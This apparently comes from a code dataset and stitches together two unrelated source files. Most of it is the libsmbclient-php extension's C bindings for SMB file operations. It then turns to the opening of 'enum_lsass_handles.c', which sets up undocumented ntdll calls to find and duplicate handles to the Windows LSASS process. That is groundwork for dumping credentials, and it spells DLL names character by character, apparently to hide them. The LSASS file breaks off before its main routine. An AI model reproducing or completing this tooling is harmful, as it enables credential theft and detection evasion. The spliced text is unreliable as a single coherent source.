ZEND_REGISTER_RESOURCE(return_value, handle, le_smbclient_file);
#endif
return;
}
hide_password(file, file_len);
switch (state->err = errno) {
case ENOMEM: php_error(E_WARNING, "Couldn't open %s: Out of memory", file); break;
case EINVAL: php_error(E_WARNING, "Couldn't open %s: No file?", file); break;
case EEXIST: php_error(E_WARNING, "Couldn't open %s: Pathname already exists and O_CREAT and O_EXECL were specified", file); break;
case EISDIR: php_error(E_WARNING, "Couldn't open %s: Can't write to a directory", file); break;
case EACCES: php_error(E_WARNING, "Couldn't open %s: Access denied", file); break;
case ENODEV: php_error(E_WARNING, "Couldn't open %s: Requested share does not exist", file); break;
case ENOTDIR: php_error(E_WARNING, "Couldn't open %s: Path component isn't a directory", file); break;
case ENOENT: php_error(E_WARNING, "Couldn't open %s: Directory in path doesn't exist", file); break;
default: php_error(E_WARNING, "Couldn't open %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_creat)
{
char *file;
strsize_t file_len;
zend_long mode = 0666;
zval *zstate;
SMBCFILE *handle;
smbc_creat_fn smbc_creat;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs|l", &zstate, &file, &file_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_creat = smbc_getFunctionCreat(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((handle = smbc_creat(state->ctx, file, (mode_t)mode)) != NULL) {
#if PHP_MAJOR_VERSION >= 7
ZVAL_RES(return_value, zend_register_resource(handle, le_smbclient_file));
#else
ZEND_REGISTER_RESOURCE(return_value, handle, le_smbclient_file);
#endif
return;
}
hide_password(file, file_len);
switch (state->err = errno) {
case ENOMEM: php_error(E_WARNING, "Couldn't create %s: Out of memory", file); break;
case EINVAL: php_error(E_WARNING, "Couldn't create %s: No file?", file); break;
case EEXIST: php_error(E_WARNING, "Couldn't create %s: Pathname already exists and O_CREAT and O_EXECL were specified", file); break;
case EISDIR: php_error(E_WARNING, "Couldn't create %s: Can't write to a directory", file); break;
case EACCES: php_error(E_WARNING, "Couldn't create %s: Access denied", file); break;
case ENODEV: php_error(E_WARNING, "Couldn't create %s: Requested share does not exist", file); break;
case ENOENT: php_error(E_WARNING, "Couldn't create %s: Directory in path doesn't exist", file); break;
default: php_error(E_WARNING, "Couldn't create %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_read)
{
zend_long count;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_read_fn smbc_read;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrl", &zstate, &zfile, &count) == FAILURE) {
return;
}
if (count < 0) {
php_error(E_WARNING, "Negative byte count: %ld", count);
RETURN_FALSE;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_read = smbc_getFunctionRead(state->ctx)) == NULL) {
RETURN_FALSE;
}
#if PHP_MAJOR_VERSION >= 7
zend_string *buf = zend_string_alloc(count, 0);
if ((ZSTR_LEN(buf) = smbc_read(state->ctx, file, ZSTR_VAL(buf), count)) >= 0) {
RETURN_STR(buf);
}
zend_string_release(buf);
#else
void *buf = emalloc(count);
ssize_t nbytes;
if ((nbytes = smbc_read(state->ctx, file, buf, count)) >= 0) {
RETURN_STRINGL(buf, nbytes, 0);
}
efree(buf);
#endif
switch (state->err = errno) {
case EISDIR: php_error(E_WARNING, "Read error: Is a directory"); break;
case EBADF: php_error(E_WARNING, "Read error: Not a valid file resource or not open for reading"); break;
case EINVAL: php_error(E_WARNING, "Read error: Object not suitable for reading or bad buffer"); break;
default: php_error(E_WARNING, "Read error: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_write)
{
zend_long count = 0;
strsize_t str_len;
char * str;
size_t nwrite;
ssize_t nbytes;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_write_fn smbc_write;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrs|l", &zstate, &zfile, &str, &str_len, &count) == FAILURE) {
return;
}
if (count < 0) {
php_error(E_WARNING, "Negative byte count: %ld", count);
RETURN_FALSE;
}
if (count == 0 || count > str_len) {
nwrite = str_len;
}
else {
nwrite = count;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_write = smbc_getFunctionWrite(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((nbytes = smbc_write(state->ctx, file, str, nwrite)) >= 0) {
RETURN_LONG(nbytes);
}
switch (state->err = errno) {
case EISDIR: php_error(E_WARNING, "Write error: Is a directory"); break;
case EBADF: php_error(E_WARNING, "Write error: Not a valid file resource or not open for reading"); break;
case EINVAL: php_error(E_WARNING, "Write error: Object not suitable for reading or bad buffer"); break;
case EACCES: php_error(E_WARNING, "Write error: Permission denied"); break;
default: php_error(E_WARNING, "Write error: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_lseek)
{
zend_long offset, whence, ret;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_lseek_fn smbc_lseek;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrll", &zstate, &zfile, &offset, &whence) == FAILURE) {
return;
}
if ((int)whence != SEEK_SET && (int)whence != SEEK_CUR && (int)whence != SEEK_END) {
php_error(E_WARNING, "Invalid argument for whence");
RETURN_FALSE;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_lseek = smbc_getFunctionLseek(state->ctx)) == NULL) {
RETURN_FALSE;
}
if ((ret = smbc_lseek(state->ctx, file, (off_t)offset, (int)whence)) > -1) {
RETURN_LONG(ret);
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't lseek: resource is invalid"); break;
case EINVAL: php_error(E_WARNING, "Couldn't lseek: invalid parameters or not initialized"); break;
default: php_error(E_WARNING, "Couldn't lseek: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_ftruncate)
{
zend_long offset;
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_ftruncate_fn smbc_ftruncate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rrl", &zstate, &zfile, &offset) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_ftruncate = smbc_getFunctionFtruncate(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_ftruncate(state->ctx, file, offset) == 0) {
RETURN_TRUE;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't ftruncate: resource is invalid"); break;
case EACCES: php_error(E_WARNING, "Couldn't ftruncate: permission denied"); break;
case EINVAL: php_error(E_WARNING, "Couldn't ftruncate: invalid parameters or not initialized"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't ftruncate: out of memory"); break;
default: php_error(E_WARNING, "Couldn't ftruncate: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_close)
{
zval *zstate;
zval *zfile;
SMBCFILE *file;
smbc_close_fn smbc_close;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_close = smbc_getFunctionClose(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_close(state->ctx, file) == 0) {
#if PHP_MAJOR_VERSION >= 7
zend_list_close(Z_RES_P(zfile));
#else
zend_list_delete(Z_LVAL_P(zfile));
#endif
RETURN_TRUE;
}
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Close error: Not a valid file resource or not open for reading"); break;
case EINVAL: php_error(E_WARNING, "Close error: State resource not initialized"); break;
default: php_error(E_WARNING, "Close error: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_chmod)
{
char *file;
strsize_t file_len;
zend_long mode;
zval *zstate;
smbc_chmod_fn smbc_chmod;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rsl", &zstate, &file, &file_len, &mode) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_chmod = smbc_getFunctionChmod(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_chmod(state->ctx, file, (mode_t)mode) == 0) {
RETURN_TRUE;
}
hide_password(file, file_len);
switch (state->err = errno) {
case EPERM: php_error(E_WARNING, "Couldn't chmod %s: the effective UID does not match the owner of the file, and is not zero", file); break;
case ENOENT: php_error(E_WARNING, "Couldn't chmod %s: file or directory does not exist", file); break;
case ENOMEM: php_error(E_WARNING, "Couldn't chmod %s: insufficient memory", file); break;
default: php_error(E_WARNING, "Couldn't chmod %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_utimes)
{
char *file;
strsize_t file_len;
zend_long mtime = -1, atime = -1;
zval *zstate;
struct timeval times[2];
smbc_utimes_fn smbc_utimes;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs|ll", &zstate, &file, &file_len, &mtime, &atime) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
times[0].tv_usec = 0; /* times[0] = access time (atime) */
times[1].tv_usec = 0; /* times[1] = write time (mtime) */
/* TODO: we are a bit lazy here about the optional arguments and assume
* that if they are negative, they were omitted. This makes it
* impossible to use legitimate negative timestamps - a rare use-case. */
times[1].tv_sec = (mtime < 0) ? time(NULL) : mtime;
/* If not given, atime defaults to value of mtime: */
times[0].tv_sec = (atime < 0) ? times[1].tv_sec : atime;
if ((smbc_utimes = smbc_getFunctionUtimes(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_utimes(state->ctx, file, times) == 0) {
RETURN_TRUE;
}
hide_password(file, file_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't set times on %s: the client library is not properly initialized", file); break;
case EPERM: php_error(E_WARNING, "Couldn't set times on %s: permission was denied", file); break;
default: php_error(E_WARNING, "Couldn't set times on %s: unknown error (%d)", file, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_listxattr)
{
char *url, *s, *c;
strsize_t url_len;
char values[1000];
zval *zstate;
smbc_listxattr_fn smbc_listxattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_listxattr = smbc_getFunctionListxattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
/* This is a bit of a bogus function. Looking in the Samba source, it
* always returns all possible attribute names, regardless of what the
* file system supports or which attributes the file actually has.
* Because this list is static, we can get away with using a fixed
* buffer size.*/
if (smbc_listxattr(state->ctx, url, values, sizeof(values)) >= 0) {
array_init(return_value);
/* Each attribute is null-separated, the list itself terminates
* with an empty element (i.e. two null bytes in a row). */
for (s = c = values; c < values + sizeof(values); c++) {
if (*c != '\0') {
continue;
}
/* c and s identical: last element */
if (s == c) {
break;
}
#if PHP_MAJOR_VERSION >= 7
add_next_index_stringl(return_value, s, c - s);
#else
add_next_index_stringl(return_value, s, c - s, 1);
#endif
s = c + 1;
}
return;
}
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't get xattrs: library not initialized"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't get xattrs: out of memory"); break;
case EPERM: php_error(E_WARNING, "Couldn't get xattrs: permission denied"); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't get xattrs: file system does not support extended attributes"); break;
default: php_error(E_WARNING, "Couldn't get xattrs: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_getxattr)
{
char *url, *name;
strsize_t url_len, name_len;
int retsize;
char values[1000];
zval *zstate;
smbc_getxattr_fn smbc_getxattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rss", &zstate, &url, &url_len, &name, &name_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_getxattr = smbc_getFunctionGetxattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
/* TODO: 1000 chars should be enough for everyone...?
* However, doing an initial blank call to determine the response size
* seems wasteful, and vulnerable to a time-of-check, time-of-use
* error. */
if ((retsize = smbc_getxattr(state->ctx, url, name, values, sizeof(values))) >= 0) {
if (retsize > sizeof(values)) {
retsize = sizeof(values);
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRINGL(values, retsize);
#else
RETURN_STRINGL(values, retsize, 1);
#endif
}
hide_password(url, url_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't get xattr for %s: library not initialized or incorrect parameter", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't get xattr for %s: out of memory", url); break;
case EPERM: php_error(E_WARNING, "Couldn't get xattr for %s: permission denied", url); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't get xattr for %s: file system does not support extended attributes", url); break;
default: php_error(E_WARNING, "Couldn't get xattr for %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_setxattr)
{
char *url, *name, *val;
strsize_t url_len, name_len, val_len;
zend_long flags = 0;
zval *zstate;
smbc_setxattr_fn smbc_setxattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rsss|l", &zstate, &url, &url_len, &name, &name_len, &val, &val_len, &flags) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_setxattr = smbc_getFunctionSetxattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_setxattr(state->ctx, url, name, val, val_len, flags) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't set attribute on %s: client library not properly initialized", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't set attribute on %s: out of memory", url); break;
case EEXIST: php_error(E_WARNING, "Couldn't set attribute on %s: attribute already exists", url); break;
case ENOATTR: php_error(E_WARNING, "Couldn't set attribute on %s: attribute does not exist", url); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't set attribute on %s: not supported by filesystem", url); break;
case EPERM: php_error(E_WARNING, "Couldn't set attribute on %s: permission denied", url); break;
default: php_error(E_WARNING, "Couldn't set attribute on %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_removexattr)
{
char *url, *name;
strsize_t url_len, name_len;
zval *zstate;
smbc_removexattr_fn smbc_removexattr;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rss", &zstate, &url, &url_len, &name, &name_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_removexattr = smbc_getFunctionRemovexattr(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_removexattr(state->ctx, url, name) == 0) {
RETURN_TRUE;
}
hide_password(url, url_len);
switch (state->err = errno) {
case EINVAL: php_error(E_WARNING, "Couldn't remove attribute on %s: client library not properly initialized", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't remove attribute on %s: out of memory", url); break;
case ENOTSUP: php_error(E_WARNING, "Couldn't remove attribute on %s: not supported by filesystem", url); break;
case EPERM: php_error(E_WARNING, "Couldn't remove attribute on %s: permission denied", url); break;
default: php_error(E_WARNING, "Couldn't remove attribute on %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
PHP_FUNCTION(smbclient_option_get)
{
zend_long option;
const char *ret;
zval *zstate;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rl", &zstate, &option) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
switch (option)
{
case SMBCLIENT_OPT_OPEN_SHAREMODE:
RETURN_LONG(smbc_getOptionOpenShareMode(state->ctx));
case SMBCLIENT_OPT_ENCRYPT_LEVEL:
RETURN_LONG(smbc_getOptionSmbEncryptionLevel(state->ctx));
case SMBCLIENT_OPT_CASE_SENSITIVE:
RETURN_BOOL(smbc_getOptionCaseSensitive(state->ctx));
case SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT:
RETURN_LONG(smbc_getOptionBrowseMaxLmbCount(state->ctx));
case SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES:
RETURN_BOOL(smbc_getOptionUrlEncodeReaddirEntries(state->ctx));
case SMBCLIENT_OPT_USE_KERBEROS:
RETURN_BOOL(smbc_getOptionUseKerberos(state->ctx));
case SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS:
RETURN_BOOL(smbc_getOptionFallbackAfterKerberos(state->ctx));
/* Reverse the sense of this option, the original is confusing: */
case SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN:
RETURN_BOOL(!(smbc_getOptionNoAutoAnonymousLogin(state->ctx)));
case SMBCLIENT_OPT_USE_CCACHE:
RETURN_BOOL(smbc_getOptionUseCCache(state->ctx));
#ifdef HAVE_SMBC_SETOPTIONUSENTHASH
case SMBCLIENT_OPT_USE_NT_HASH:
RETURN_BOOL(smbc_getOptionUseNTHash(state->ctx));
#endif
#ifdef HAVE_SMBC_SETPORT
case SMBCLIENT_OPT_PORT:
RETURN_LONG(smbc_getPort(state->ctx));
#endif
case SMBCLIENT_OPT_TIMEOUT:
RETURN_LONG(smbc_getTimeout(state->ctx));
case SMBCLIENT_OPT_NETBIOS_NAME:
if ((ret = smbc_getNetbiosName(state->ctx)) == NULL) {
RETURN_EMPTY_STRING();
}
if (strlen(ret) == 0) {
RETURN_EMPTY_STRING();
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(ret);
#else
RETURN_STRING(ret, 1);
#endif
case SMBCLIENT_OPT_WORKGROUP:
if ((ret = smbc_getWorkgroup(state->ctx)) == NULL) {
RETURN_EMPTY_STRING();
}
if (strlen(ret) == 0) {
RETURN_EMPTY_STRING();
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(ret);
#else
RETURN_STRING(ret, 1);
#endif
case SMBCLIENT_OPT_USER:
if ((ret = smbc_getUser(state->ctx)) == NULL) {
RETURN_EMPTY_STRING();
}
if (strlen(ret) == 0) {
RETURN_EMPTY_STRING();
}
#if PHP_MAJOR_VERSION >= 7
RETURN_STRING(ret);
#else
RETURN_STRING(ret, 1);
#endif
}
RETURN_NULL();
}
PHP_FUNCTION(smbclient_option_set)
{
zend_long option, vbool = 0;
zval *zstate;
zval *zvalue;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rlz", &zstate, &option, &zvalue) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
switch (Z_TYPE_P(zvalue))
{
#if PHP_MAJOR_VERSION >= 7
case IS_TRUE:
vbool = 1;
/* no break, fallthrough */
case IS_FALSE:
#else
case IS_BOOL:
vbool = Z_BVAL_P(zvalue);
#endif
switch (option)
{
case SMBCLIENT_OPT_CASE_SENSITIVE:
smbc_setOptionCaseSensitive(state->ctx, vbool);
RETURN_TRUE;
case SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES:
smbc_setOptionUrlEncodeReaddirEntries(state->ctx, vbool);
RETURN_TRUE;
case SMBCLIENT_OPT_USE_KERBEROS:
smbc_setOptionUseKerberos(state->ctx, vbool);
RETURN_TRUE;
case SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS:
smbc_setOptionFallbackAfterKerberos(state->ctx, vbool);
RETURN_TRUE;
/* Reverse the sense of this option: */
case SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN:
smbc_setOptionNoAutoAnonymousLogin(state->ctx, !(vbool));
RETURN_TRUE;
case SMBCLIENT_OPT_USE_CCACHE:
smbc_setOptionUseCCache(state->ctx, vbool);
RETURN_TRUE;
#ifdef HAVE_SMBC_SETOPTIONUSENTHASH
case SMBCLIENT_OPT_USE_NT_HASH:
smbc_setOptionUseNTHash(state->ctx, vbool);
RETURN_TRUE;
#endif
}
break;
case IS_LONG:
switch (option)
{
case SMBCLIENT_OPT_OPEN_SHAREMODE:
smbc_setOptionOpenShareMode(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
case SMBCLIENT_OPT_ENCRYPT_LEVEL:
smbc_setOptionSmbEncryptionLevel(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
case SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT:
smbc_setOptionBrowseMaxLmbCount(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
#ifdef HAVE_SMBC_SETPORT
case SMBCLIENT_OPT_PORT:
smbc_setPort(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
#endif
case SMBCLIENT_OPT_TIMEOUT:
smbc_setTimeout(state->ctx, Z_LVAL_P(zvalue));
RETURN_TRUE;
}
break;
case IS_STRING:
switch (option)
{
case SMBCLIENT_OPT_NETBIOS_NAME:
smbc_setNetbiosName(state->ctx, Z_STRVAL_P(zvalue));
RETURN_TRUE;
/* For the next two options, update our state object as well: */
case SMBCLIENT_OPT_WORKGROUP:
if (ctx_init_getauth(zvalue, &state->wrkg, &state->wrkglen, "workgroup") == 0) {
RETURN_FALSE;
}
smbc_setWorkgroup(state->ctx, Z_STRVAL_P(zvalue));
RETURN_TRUE;
case SMBCLIENT_OPT_USER:
if (ctx_init_getauth(zvalue, &state->user, &state->userlen, "username") == 0) {
RETURN_FALSE;
}
smbc_setUser(state->ctx, Z_STRVAL_P(zvalue));
RETURN_TRUE;
}
break;
}
RETURN_FALSE;
}
#if HAVE_SMBC_SETOPTIONPROTOCOLS
PHP_FUNCTION(smbclient_client_protocols)
{
zval *zstate;
char *minproto = NULL, *maxproto = NULL;
strsize_t minproto_len, maxproto_len;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "r|s!s!", &zstate, &minproto, &minproto_len, &maxproto, &maxproto_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
RETURN_BOOL(smbc_setOptionProtocols(state->ctx, minproto, maxproto));
}
#endif
PHP_FUNCTION(smbclient_statvfs)
{
char *url;
strsize_t url_len;
zval *zstate;
struct statvfs st;
smbc_statvfs_fn smbc_statvfs;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rs", &zstate, &url, &url_len) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
if ((smbc_statvfs = smbc_getFunctionStatVFS(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_statvfs(state->ctx, url, &st) != 0) {
hide_password(url, url_len);
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't statvfs %s: bad file descriptor", url); break;
case EACCES: php_error(E_WARNING, "Couldn't statvfs %s: permission denied", url); break;
case EINVAL: php_error(E_WARNING, "Couldn't statvfs %s: library not initalized or otherwise invalid", url); break;
case ENOMEM: php_error(E_WARNING, "Couldn't statvfs %s: out of memory", url); break;
default: php_error(E_WARNING, "Couldn't statvfs %s: unknown error (%d)", url, errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_assoc_long(return_value, "bsize", st.f_bsize);
add_assoc_long(return_value, "frsize", st.f_frsize);
add_assoc_long(return_value, "blocks", st.f_blocks);
add_assoc_long(return_value, "bfree", st.f_bfree);
add_assoc_long(return_value, "bavail", st.f_bavail);
add_assoc_long(return_value, "files", st.f_files);
add_assoc_long(return_value, "ffree", st.f_ffree);
add_assoc_long(return_value, "favail", st.f_favail);
add_assoc_long(return_value, "fsid", st.f_fsid);
add_assoc_long(return_value, "flag", st.f_flag);
add_assoc_long(return_value, "namemax", st.f_namemax);
}
PHP_FUNCTION(smbclient_fstatvfs)
{
zval *zstate;
zval *zfile;
SMBCFILE *file;
struct statvfs st;
smbc_fstatvfs_fn smbc_fstatvfs;
php_smbclient_state *state;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "rr", &zstate, &zfile) == FAILURE) {
return;
}
STATE_FROM_ZSTATE;
FILE_FROM_ZFILE;
if ((smbc_fstatvfs = smbc_getFunctionFstatVFS(state->ctx)) == NULL) {
RETURN_FALSE;
}
if (smbc_fstatvfs(state->ctx, file, &st) != 0) {
switch (state->err = errno) {
case EBADF: php_error(E_WARNING, "Couldn't fstatvfs: bad file descriptor"); break;
case EACCES: php_error(E_WARNING, "Couldn't fstatvfs: permission denied"); break;
case EINVAL: php_error(E_WARNING, "Couldn't fstatvfs: library not initalized or otherwise invalid"); break;
case ENOMEM: php_error(E_WARNING, "Couldn't fstatvfs: out of memory"); break;
default: php_error(E_WARNING, "Couldn't fstatvfs: unknown error (%d)", errno); break;
}
RETURN_FALSE;
}
array_init(return_value);
add_assoc_long(return_value, "bsize", st.f_bsize);
add_assoc_long(return_value, "frsize", st.f_frsize);
add_assoc_long(return_value, "blocks", st.f_blocks);
add_assoc_long(return_value, "bfree", st.f_bfree);
add_assoc_long(return_value, "bavail", st.f_bavail);
add_assoc_long(return_value, "files", st.f_files);
add_assoc_long(return_value, "ffree", st.f_ffree);
add_assoc_long(return_value, "favail", st.f_favail);
add_assoc_long(return_value, "fsid", st.f_fsid);
add_assoc_long(return_value, "flag", st.f_flag);
add_assoc_long(return_value, "namemax", st.f_namemax);
}
| remicollet/libsmbclient-php |
<|start_filename|>enum_lsass_handles.c<|end_filename|>
#ifndef UNICODE
#define UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectBasicInformation 0
#define ObjectNameInformation 1
#define ObjectTypeInformation 2
typedef HANDLE(NTAPI* _NtOpenProcess)(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
typedef NTSTATUS(NTAPI* _NtQueryObject)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef BOOL(NTAPI* _NtQueryFullProcessImageNameW)(
HANDLE hProcess,
DWORD dwFlags,
LPWSTR lpExeName,
PDWORD lpdwSize
);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _SYSTEM_HANDLE {
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef enum _POOL_TYPE {
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_TYPE_INFORMATION {
UNICODE_STRING Name;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG TotalPagedPoolUsage;
ULONG TotalNonPagedPoolUsage;
ULONG TotalNamePoolUsage;
ULONG TotalHandleTableUsage;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
ULONG HighWaterPagedPoolUsage;
ULONG HighWaterNonPagedPoolUsage;
ULONG HighWaterNamePoolUsage;
ULONG HighWaterHandleTableUsage;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccess;
BOOLEAN SecurityRequired;
BOOLEAN MaintainHandleCount;
USHORT MaintainTypeList;
POOL_TYPE PoolType;
ULONG PagedPoolUsage;
ULONG NonPagedPoolUsage;
} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName) {
return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}
void ErrorExit(LPTSTR lpszFunction) {
// Retrieve the system error message for the last-error code
LPVOID lpMsgBuf;
LPVOID lpDisplayBuf;
DWORD dw = GetLastError();
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
dw,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR)&lpMsgBuf,
0, NULL);
printf((LPTSTR)lpMsgBuf);
LocalFree(lpMsgBuf);
LocalFree(lpDisplayBuf);
ExitProcess(dw);
}
void ShowErr() {
CHAR errormsg[100];
FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, errormsg, sizeof(errormsg), NULL);
printf("ERROR: %s", errormsg);
}
HANDLE enum_lsass_handles() {
char ntdll[] = { 'n','t','d','l','l','.','d','l','l',0};
char kernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l',0};
